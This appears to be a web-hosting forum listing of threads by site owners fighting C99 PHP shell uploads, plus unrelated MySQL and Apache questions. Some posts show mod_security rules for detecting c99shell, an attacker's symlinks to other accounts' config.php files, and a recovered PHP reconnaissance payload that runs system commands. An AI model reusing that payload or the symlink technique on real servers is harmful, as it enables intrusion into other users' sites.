C99Shell Stop Shell Hacking Totally?
Oct 19, 2007
Is there a way to stop them totally? i.e. even though they are successfully uploaded but I do not want the source to be available to them etc.?
I mean, is there a way to hide or not allow them to execute any shell?
View 7 Replies
ADVERTISEMENT
Nov 5, 2009
How to stops the scripts like c99 shell from installing into the server?
View 1 Replies
View Related
Aug 15, 2008
how i can detect and disable C99 shell and another shell script exp:r57 ....
View 9 Replies
View Related
Sep 1, 2008
I have few scripts, but hackers again upload at some way c99, and hack some SMF forums at server. Server like server they cannot hack, but user account they can. So please tell me what you advice?
View 6 Replies
View Related
Feb 6, 2009
a site i manage for a client is being hacked every couple of days, its not the actual site but the hosts server thats getting attacked, all sites on that server, well actually all thier servers.
They have made no attempt to sort this problem, i report it they look at the site and say "site loads fine for us" which it does.
All index files are having a base64 encode line written after the <body> tag, this adds hundreds of spam links which are hidden with display:none; they also add .html to application types in htaccess for php to run in these files too.
Problem is, i am moving the site to another host but cannot change the nameservers to the new host's untill the client returns from a holiday, so i must keep the site up on the insecure host for now.
I am removing the spam code almost daily, is there anyway i can stop this attack happening for the time being, the host does nothing.
View 14 Replies
View Related
Apr 23, 2009
one of my client account has just been hacked with c.100 exploit. This method injects 1 php file that acts like fully featured file manager. This hacker use my client account to place multiple scam & phissing sites
now i'm wondering if this kind of exploit hacking have a way to counter them as my friend that there aren't any proved method untill now :-/
This is the php file i've recovered:
<<url removed>>
FYI, my server configuration:
- apache 2.2.11
- centos 5.2
- cpanel + whm 11.24.4
- suphp, clamav & modsec enabled
View 14 Replies
View Related
Jul 13, 2008
Recently my site was defaced, (i own a dedicated server), my server was not touched, but one of the applications I used on the site was exploited to gain access to it.
I have noticed 4 or 5 c99 shells in different locations on my ftp. The site is back online, but it's definitely possible that they have one of these hidden somewhere and that they'll just do it again. I am using cent os 5
How can I easily search for these on my box? Can I disable their functionality? is there setting I can use in htaccess or something to make my website safer? I visited one of the scripts, and it said SAFEMODE OFF, how can I at least enable safemode?
I don't know much of anything about linux, but I am running cpanel and WHM. I have a guy who manages my box but he is hard to get a hold of sometimes, and I'd like to take care of this ASAP!
View 6 Replies
View Related
Aug 17, 2007
How can I block somebody send email using ....@server.myserver.com?
I terminated his account, but he is using ...@server.myserver.com
I need to have a company who can take care of this issues.
View 0 Replies
View Related
Jun 10, 2008
Has anyone had any more luck getting a response to either tickets or emails from Burton Hosting since the last thread here, which is months old? Our uptime remains decent, but with absolutely no responses to tickets (we have many outstanding by now) or emails (both to the standard network and support addresses and to individuals personally), and their phones disconnected, we of course are very concerned, and will probably be forced to look for a new host (I just hate the hassle!!) when our contract expires next month.
I did find in another forum posts about a Virante Marketing fiasco in which Burton was falsifying reviews, etc.---this does NOT sound like the Burton I knew before.
While we have exploratory emails out to DreamHost and a few others, I was hoping someone here would know a way to contact Burton---I just hate not knowing!
View 14 Replies
View Related
Jul 26, 2009
Quad Core server, 4GB ram. MySQL runs at all times between 200 - 300% CPU. Server does only 5K unique per day, and runs zen cart.
I am at a loss, I have experiece with tracking dowen reasons for this but this one has stumpped me. So I was hoping to get new eyes on this and see if anyone had any ideas.
my.cnf
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
#old_passwords=1
skip-locking
skip-name-resolve
skip-bdb
key_buffer = 64M
max_allowed_packet = 16M
table_cache = 2048
sort_buffer_size = 1M
read_buffer_size = 1M
read_rnd_buffer_size = 8M
myisam_sort_buffer_size = 64M
thread_cache_size = 16
thread_concurrency = 8
query_cache_size = 25M
query_cache_type = 1
tmp_table_size=64M
back_log = 100
max_connect_errors = 10000
join_buffer_size=1M
open-files = 20000
interactive_timeout = 300
wait_timeout = 300
max_connections=200
# The following directives should be commented out
# but included as they are things that get added
# very frequently on tickets. These are more in a
# need-this-feature basis.
# The below 2 cannot be set on the fly. If the customer already has
# InnoDB tables and wants to change the size of the InnoDB tablespace
# and InnoDB logs, then:
# 1. Run a full backup with mysqldump
# 2. Stop MySQL
# 3. Move current ibdata and ib_logfiles out of /var/lib/mysql
# 4. Uncomment the below innodb_data_file_path and innodb_log_file_size
# 5. Start MySQL (it will recreate new InnoDB files)
# 6. Restore data from backup
#innodb_data_file_path = ibdata1:2000M;ibdata2:10M:autoextend
#innodb_log_file_size = 100M
innodb_buffer_pool_size = 64M
innodb_additional_mem_pool_size = 8M
#log-slow-queries=/var/lib/mysqllogs/slow-log
#long_query_time=2
#log-queries-not-using-indexes
#log-bin=/var/lib/mysqllogs/bin-log
#log-slave-updates
#expire_logs_days = 14
server-id = 1
[mysql.server]
user=mysql
#basedir=/var/lib
[mysqld_safe]
err-log=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid
open_files_limit=65536
mysqladmin status
Uptime: 1458 Threads: 1 Questions: 366975 Slow queries: 0 Opens: 401 Flush tables: 1 Open tables: 395 Queries per second avg: 251.698
SHOW STATUS;
mysql> SHOW STATUS;
+-----------------------------------+----------+
| Variable_name | Value |
+-----------------------------------+----------+
| Aborted_clients | 0 |
| Aborted_connects | 8 |
| Binlog_cache_disk_use | 0 |
| Binlog_cache_use | 0 |
| Bytes_received | 116 |
| Bytes_sent | 157 |
| Com_admin_commands | 0 |
| Com_alter_db | 0 |
| Com_alter_table | 0 |
| Com_analyze | 0 |
| Com_backup_table | 0 |
| Com_begin | 0 |
| Com_call_procedure | 0 |
| Com_change_db | 0 |
| Com_change_master | 0 |
| Com_check | 0 |
| Com_checksum | 0 |
| Com_commit | 0 |
| Com_create_db | 0 |
| Com_create_function | 0 |
| Com_create_index | 0 |
| Com_create_table | 0 |
| Com_create_user | 0 |
| Com_dealloc_sql | 0 |
| Com_delete | 0 |
| Com_delete_multi | 0 |
| Com_do | 0 |
| Com_drop_db | 0 |
| Com_drop_function | 0 |
| Com_drop_index | 0 |
| Com_drop_table | 0 |
| Com_drop_user | 0 |
| Com_execute_sql | 0 |
| Com_flush | 0 |
| Com_grant | 0 |
| Com_ha_close | 0 |
| Com_ha_open | 0 |
| Com_ha_read | 0 |
| Com_help | 0 |
| Com_insert | 0 |
| Com_insert_select | 0 |
| Com_kill | 0 |
| Com_load | 0 |
| Com_load_master_data | 0 |
| Com_load_master_table | 0 |
| Com_lock_tables | 0 |
| Com_optimize | 0 |
| Com_preload_keys | 0 |
| Com_prepare_sql | 0 |
| Com_purge | 0 |
| Com_purge_before_date | 0 |
| Com_rename_table | 0 |
| Com_repair | 0 |
| Com_replace | 0 |
| Com_replace_select | 0 |
| Com_reset | 0 |
| Com_restore_table | 0 |
| Com_revoke | 0 |
| Com_revoke_all | 0 |
| Com_rollback | 0 |
| Com_savepoint | 0 |
| Com_select | 1 |
| Com_set_option | 0 |
| Com_show_binlog_events | 0 |
| Com_show_binlogs | 0 |
| Com_show_charsets | 0 |
| Com_show_collations | 0 |
| Com_show_column_types | 0 |
| Com_show_create_db | 0 |
| Com_show_create_table | 0 |
| Com_show_databases | 0 |
| Com_show_errors | 0 |
| Com_show_fields | 0 |
| Com_show_grants | 0 |
| Com_show_innodb_status | 0 |
| Com_show_keys | 0 |
| Com_show_logs | 0 |
| Com_show_master_status | 0 |
| Com_show_ndb_status | 0 |
| Com_show_new_master | 0 |
| Com_show_open_tables | 0 |
| Com_show_privileges | 0 |
| Com_show_processlist | 0 |
| Com_show_slave_hosts | 0 |
| Com_show_slave_status | 0 |
| Com_show_status | 1 |
| Com_show_storage_engines | 0 |
| Com_show_tables | 0 |
| Com_show_triggers | 0 |
| Com_show_variables | 0 |
| Com_show_warnings | 0 |
| Com_slave_start | 0 |
| Com_slave_stop | 0 |
| Com_stmt_close | 0 |
| Com_stmt_execute | 0 |
| Com_stmt_fetch | 0 |
| Com_stmt_prepare | 0 |
| Com_stmt_reset | 0 |
| Com_stmt_send_long_data | 0 |
| Com_truncate | 0 |
| Com_unlock_tables | 0 |
| Com_update | 0 |
| Com_update_multi | 0 |
| Com_xa_commit | 0 |
| Com_xa_end | 0 |
| Com_xa_prepare | 0 |
| Com_xa_recover | 0 |
| Com_xa_rollback | 0 |
| Com_xa_start | 0 |
| Compression | OFF |
| Connections | 1569 |
| Created_tmp_disk_tables | 0 |
| Created_tmp_files | 5 |
| Created_tmp_tables | 1 |
| Delayed_errors | 0 |
| Delayed_insert_threads | 0 |
| Delayed_writes | 0 |
| Flush_commands | 1 |
| Handler_commit | 0 |
| Handler_delete | 0 |
| Handler_discover | 0 |
| Handler_prepare | 0 |
| Handler_read_first | 0 |
| Handler_read_key | 0 |
| Handler_read_next | 0 |
| Handler_read_prev | 0 |
| Handler_read_rnd | 0 |
| Handler_read_rnd_next | 0 |
| Handler_rollback | 0 |
| Handler_savepoint | 0 |
| Handler_savepoint_rollback | 0 |
| Handler_update | 0 |
| Handler_write | 132 |
| Innodb_buffer_pool_pages_data | 307 |
| Innodb_buffer_pool_pages_dirty | 0 |
| Innodb_buffer_pool_pages_flushed | 1 |
| Innodb_buffer_pool_pages_free | 3787 |
| Innodb_buffer_pool_pages_latched | 0 |
| Innodb_buffer_pool_pages_misc | 2 |
| Innodb_buffer_pool_pages_total | 4096 |
| Innodb_buffer_pool_read_ahead_rnd | 2 |
| Innodb_buffer_pool_read_ahead_seq | 0 |
| Innodb_buffer_pool_read_requests | 48197 |
| Innodb_buffer_pool_reads | 205 |
| Innodb_buffer_pool_wait_free | 0 |
| Innodb_buffer_pool_write_requests | 1 |
| Innodb_data_fsyncs | 7 |
| Innodb_data_pending_fsyncs | 0 |
| Innodb_data_pending_reads | 0 |
| Innodb_data_pending_writes | 0 |
| Innodb_data_read | 7213056 |
| Innodb_data_reads | 221 |
| Innodb_data_writes | 7 |
| Innodb_data_written | 35328 |
| Innodb_dblwr_pages_written | 1 |
| Innodb_dblwr_writes | 1 |
| Innodb_log_waits | 0 |
| Innodb_log_write_requests | 0 |
| Innodb_log_writes | 2 |
| Innodb_os_log_fsyncs | 5 |
| Innodb_os_log_pending_fsyncs | 0 |
| Innodb_os_log_pending_writes | 0 |
| Innodb_os_log_written | 1024 |
| Innodb_page_size | 16384 |
| Innodb_pages_created | 0 |
| Innodb_pages_read | 307 |
| Innodb_pages_written | 1 |
| Innodb_row_lock_current_waits | 0 |
| Innodb_row_lock_time | 0 |
| Innodb_row_lock_time_avg | 0 |
| Innodb_row_lock_time_max | 0 |
| Innodb_row_lock_waits | 0 |
| Innodb_rows_deleted | 0 |
| Innodb_rows_inserted | 0 |
| Innodb_rows_read | 165 |
| Innodb_rows_updated | 0 |
| Key_blocks_not_flushed | 0 |
| Key_blocks_unused | 52512 |
| Key_blocks_used | 1074 |
| Key_read_requests | 24616475 |
| Key_reads | 1170 |
| Key_write_requests | 11301 |
| Key_writes | 4948 |
| Last_query_cost | 0.000000 |
| Max_used_connections | 13 |
| Not_flushed_delayed_rows | 0 |
| Open_files | 495 |
| Open_streams | 0 |
| Open_tables | 395 |
| Opened_tables | 0 |
| Prepared_stmt_count | 0 |
| Qcache_free_blocks | 440 |
| Qcache_free_memory | 2620672 |
| Qcache_hits | 293141 |
| Qcache_inserts | 69381 |
| Qcache_lowmem_prunes | 60094 |
| Qcache_not_cached | 20918 |
| Qcache_queries_in_cache | 1338 |
| Qcache_total_blocks | 5755 |
| Questions | 394590 |
| Rpl_status | NULL |
| Select_full_join | 0 |
| Select_full_range_join | 0 |
| Select_range | 0 |
| Select_range_check | 0 |
| Select_scan | 1 |
| Slave_open_temp_tables | 0 |
| Slave_retried_transactions | 0 |
| Slave_running | OFF |
| Slow_launch_threads | 0 |
| Slow_queries | 0 |
| Sort_merge_passes | 0 |
| Sort_range | 0 |
| Sort_rows | 0 |
| Sort_scan | 0 |
| Ssl_accept_renegotiates | 0 |
| Ssl_accepts | 0 |
| Ssl_callback_cache_hits | 0 |
| Ssl_cipher | |
| Ssl_cipher_list | |
| Ssl_client_connects | 0 |
| Ssl_connect_renegotiates | 0 |
| Ssl_ctx_verify_depth | 0 |
| Ssl_ctx_verify_mode | 0 |
| Ssl_default_timeout | 0 |
| Ssl_finished_accepts | 0 |
| Ssl_finished_connects | 0 |
| Ssl_session_cache_hits | 0 |
| Ssl_session_cache_misses | 0 |
| Ssl_session_cache_mode | NONE |
| Ssl_session_cache_overflows | 0 |
| Ssl_session_cache_size | 0 |
| Ssl_session_cache_timeouts | 0 |
| Ssl_sessions_reused | 0 |
| Ssl_used_session_cache_entries | 0 |
| Ssl_verify_depth | 0 |
| Ssl_verify_mode | 0 |
| Ssl_version | |
| Table_locks_immediate | 173929 |
| Table_locks_waited | 3 |
| Tc_log_max_pages_used | 0 |
| Tc_log_page_size | 0 |
| Tc_log_page_waits | 0 |
| Threads_cached | 11 |
| Threads_connected | 2 |
| Threads_created | 13 |
| Threads_running | 2 |
| Uptime | 1540 |
| Uptime_since_flush_status | 1540 |
+-----------------------------------+----------+
View 14 Replies
View Related
Oct 7, 2009
I'm configuring an VPS that's going to serve all static stuff and absolutely no dynamic scripts at all.
What could be the bottle necks with all these static content websites? Can a 256MB VPS handle a static website receiving millions of page views a month?
View 1 Replies
View Related
Dec 11, 2013
I am trying to get a Apache (Win7x64) to run using totally custom config files, so far I have this:
Code : httpd.exe -f ......confapachehttpd.conf
Loads fine and here is my trivial config:
Code:
Listen 8082
ServerRoot web�inapacheapache-2.4
ServerName fitrak.me
DocumentRoot webhomewebsites
Regardless of whether I make the DocumentRoot absolute or relative Apache still won't load index.html
500 Internal Server Error
Nothing coming up erroneous in the logs...WTF am I missing???
The port is not occupied...
View 2 Replies
View Related
Jul 8, 2008
Do any1 know how to change jail shell to normal shell?
View 14 Replies
View Related
Jul 30, 2009
I found these folders in the root
/usr/bin/c99
/usr/include/boost/numeric/interval/detail/c99_rounding_control.hpp
/usr/include/boost/numeric/interval/detail/c99sub_rounding_control.hpp
what are these ? is it normal folders ? or somebody hacked our server?
what shall I do?
View 10 Replies
View Related
Jul 1, 2009
I just installed zen cart on my webhosting and after few days later i saw some file written like core1405.php and when i open to view the file it is actually trojan c99shell.
I have deleted all of the core file. Now how can i prevent it from happen again? Cause it is too much work to clean up the hosting server.
View 14 Replies
View Related
Jun 5, 2007
I installed modsecurity from Addone module in Cpanel
When I try to apply phpshell woork good without a mistakes and I can do anything despite of the presence of protection modsecurity and disable_functions in php.ini.
Is there a particular settings add to the httpd.conf to prevent application phpshell or prevent upload it to the site?
View 14 Replies
View Related
Jun 25, 2007
guys im tired off fighting those hackers everyday! i have about 20 websites,and everyday i have one of them hacked! i restore a backup then another one hacked!
thats unbelivable!!!
those bastards upload there shell scripts to websites via bugs or whatever from php files!!
is there anyway to stop these commands?
can .htaccess helps? how?
i talked to my webhosting companies for my websites! ....
View 10 Replies
View Related
Sep 3, 2007
the biggest security issue i have with my clients is php c99 shell and similar php files, somehow these files uploaded on the website and from here they start attacking the websites.
i have seen also that once you upload the c99 php file you are able to see the accounts information ( such as a user name ) on the same server
so is there any way to disable this kind of php file or at least disable some function within the file!
i have been thinking to install and run a antivirus on the server , but i see sometimes they upload the encrypted version of the file , so the antirus can't catch the file as a torjan!
View 14 Replies
View Related
Oct 3, 2007
i want to prevent c99shell scripts from running.
I found this rule to detect URI's for the c99 shell.
#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"
My problem is that the hackers are being more stealthy and calling the
script some random name like .../myphpstuff.php. So the URI no longer helps detect it.
How could I detect "c99shell" in the actual file that apache servers? This assumes that the hacker was successfully in installing it.
my box
Apache 1.3.37
WHM 11.2.0 cPanel 11.11.0-R16983
FEDORA 5 i686 - WHM X v3.1.0
View 3 Replies
View Related
May 7, 2009
today i have a lot of hacking on my server .
i searched for shell scripts on the server , and i found alot of it :
[root@host svt]# ls -l
total 48
-rw-r--r-- 1 koky koky 6700 May 7 08:14 s.php
lrwxrwxrwx 1 koky koky 48 May 7 08:07 s1 -> /home/user1/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:12 s2 -> /home/user2/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 48 May 7 08:19 s3 -> /home/user3/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:37 s5 -> /home/user4/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 49 May 7 08:49 s6 -> /home/user5/public_html/vb/includes/config.php
-rw-r--r-- 1 koky koky 13199 May 7 07:59 ss.php
-rwxr-xr-x 1 koky koky 23005 May 7 07:58 svt.svt
as u can see he uploaded the files on this account "koky" and redirected this files to user1,user2,user3,user4 and user5 accounts .
and he could read the config.php and then hacked the site easly !!
i read befor that the reason of this is Perl on the server , and the way to solve it to edit httpd.conf by adding this in it :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
and then restart the http :
service httpd restart
i did all of that , and when i restarted http it said :
[root@host www]# service httpd restart
Syntax error on line 51 of /usr/local/apache/conf/httpd.conf:
Invalid command 'Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch', perhaps misspelled or defined by a module not included in the server configuration
and all the sites got down !
i deleted :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
from httpd.conf and then sites worked correctly .
so you all know my problem now ! and i think alot of you have the same problem , so i wish we all try to find any solution for this and knows the best way to protect pel on the server .
View 5 Replies
View Related
Jun 8, 2009
As well all know there has been a hypervm exploit which may have taken down fsckvps and other hosts have been having attacks. If possible install any program that will warn you of a connection to your server and or provide input on what it may or may not be.
I myself Just had a blank php format file uploaded to a clients vps and It tried accessing other vps servers. As far as I know the ip was rapidly changing and untraceable (this may or may not be from the exploit), If anyone else is having hypervm attacks or server attacks please post here so instead of working within our own company's we are working as a group of over 10 thousand+ wht members to solve this issue ourselves.
(mods may move this wherever)
View 14 Replies
View Related
Jan 15, 2008
i have a server and these days my server is hacking by the hacker the problem is, chmod 777, there are many dir's with the chmod 777 and hacker is uploading files and creating folders under the folder which is created with chmod 777, now i just want to know how i can block the hacker, and is there any way to allow the scripts which in my server and not allow any other scripts to upload files in my server
i have linux server
View 14 Replies
View Related
Feb 22, 2007
my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.
[url]
[url]
[url]
[url]
[url]
I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.
Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.
View 1 Replies
View Related
Jun 27, 2007
alot of Databases in my server was hacked
Hacker can edit tables
Are there any any ports in MYSQL4?
View 14 Replies
View Related
Jun 20, 2007
Alot of VB forums have hacking every day
In fact All hackers couldn't hack databases or files
They only edit one template in style like header or forumhome
So Uploading style again resolve the problem
But How can I disallow them to to edit templates
Any functiond to disable or rule for mod_sec ?
View 4 Replies
View Related
Sep 13, 2007
see the log entries below:
LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i""
1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
View 1 Replies
View Related
Nov 29, 2007
I keep reading all these devastating posts about people's machines being compromised. Are most of these hacks due to weak passwords of administrators or clients which end up getting bruted, or are there known exploits for cpanel/plesk/apache etc? I am setting up an apache-only server with a really secure password, but I am wondering if it could still be breached using an exploit.
View 14 Replies
View Related
Apr 25, 2007
Purely by accident I logged in a few minutes ago onto my server and ran a 'ps -ax'
At the very end I had the following lines:
29803 ? S 0:00 /bin/sh /usr/local/sbin/bfd -s
29804 ? D 0:00 /bin/sh /usr/local/bfd/tlog /var/log/secure sshd.4
29805 ? S 0:00 grep sshd
29807 ? S 0:00 grep -viw error: Bind
29808 ? S 0:00 sed s/::ffff://
29814 ? S 0:00 grep -iw Illegal user
29816 ? S 0:00 grep -iwv Failed password for illegal user
29817 ? S 0:00 grep -iwf /usr/local/bfd/pattern.auth
29818 ? S 0:00 awk {print$10":"$8}
29819 ? S 0:00 grep -E [0-9]+
Is this someone hacking my password file or is this something diffrent?
View 2 Replies
View Related
May 28, 2008
I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.
And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?
------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);
......
-------------------------------------------------------------------
View 3 Replies
View Related
Jul 20, 2008
I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so, i can't even block that many IPs.
++++++++++++
The CODE
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
View 5 Replies
View Related
